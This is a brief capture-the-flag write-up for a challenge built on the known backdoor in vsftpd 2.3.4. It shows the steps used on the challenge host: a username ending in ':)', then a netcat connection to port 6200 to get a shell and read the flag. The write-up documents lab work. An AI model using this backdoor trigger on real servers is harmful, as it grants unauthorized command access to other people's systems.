Tags: misc net 


Very Secure FTP

tags: misc | net


I'm using the very secure ftp daemon for my projects: ftp vsftp.uni.hctf.fun 2121 Still someone managed to get my secret file :(. Maybe this has something to do with it...

The link takes to a pastebin that contains a diff of vsftpd-2.3.4.


The version 2.3.4 of vsftpd is well known for being compromised with a backdoor.<br> From wikipedia:

In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200.

So I just needed to connect to the service with ftp vsftp.uni.hctf.fun 2121 and enter an username ending with ":)".

I could then execute: nc vsftp.uni.hctf.fun 6200 to connect to the new shell and check the content of the server:


  cat flag.txt

Here it is!

Original writeup (https://github.com/draane/CTF/tree/master/PWN_CTF_2018/Very%20Secure%20FTP).